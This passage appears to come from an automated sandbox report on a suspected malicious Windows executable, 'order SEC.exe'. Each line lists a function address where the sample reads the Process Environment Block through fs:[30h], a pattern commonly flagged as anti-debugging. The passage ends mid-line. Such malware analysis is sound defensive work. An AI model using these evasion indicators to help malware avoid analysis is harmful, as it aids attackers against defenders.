        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05895D55 mov eax, dword ptr fs:[00000030h]0_2_05895D55
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05895D55 mov eax, dword ptr fs:[00000030h]0_2_05895D55
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05895D55 mov eax, dword ptr fs:[00000030h]0_2_05895D55
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583056B mov eax, dword ptr fs:[00000030h]0_2_0583056B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580356C mov eax, dword ptr fs:[00000030h]0_2_0580356C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580356C mov eax, dword ptr fs:[00000030h]0_2_0580356C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05817488 mov eax, dword ptr fs:[00000030h]0_2_05817488
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov ecx, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0C9A mov eax, dword ptr fs:[00000030h]0_2_058C0C9A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058014A0 mov eax, dword ptr fs:[00000030h]0_2_058014A0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D84CD mov eax, dword ptr fs:[00000030h]0_2_058D84CD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580ACC0 mov eax, dword ptr fs:[00000030h]0_2_0580ACC0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582E4C6 mov eax, dword ptr fs:[00000030h]0_2_0582E4C6
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582E4C6 mov eax, dword ptr fs:[00000030h]0_2_0582E4C6
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05804CD0 mov eax, dword ptr fs:[00000030h]0_2_05804CD0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811CDD mov eax, dword ptr fs:[00000030h]0_2_05811CDD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811CDD mov eax, dword ptr fs:[00000030h]0_2_05811CDD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811CDD mov eax, dword ptr fs:[00000030h]0_2_05811CDD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802CFB mov eax, dword ptr fs:[00000030h]0_2_05802CFB
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05801C09 mov eax, dword ptr fs:[00000030h]0_2_05801C09
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821410 mov ecx, dword ptr fs:[00000030h]0_2_05821410
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583341B mov eax, dword ptr fs:[00000030h]0_2_0583341B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583341B mov eax, dword ptr fs:[00000030h]0_2_0583341B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583341B mov eax, dword ptr fs:[00000030h]0_2_0583341B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CA416 mov eax, dword ptr fs:[00000030h]0_2_058CA416
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CA416 mov ea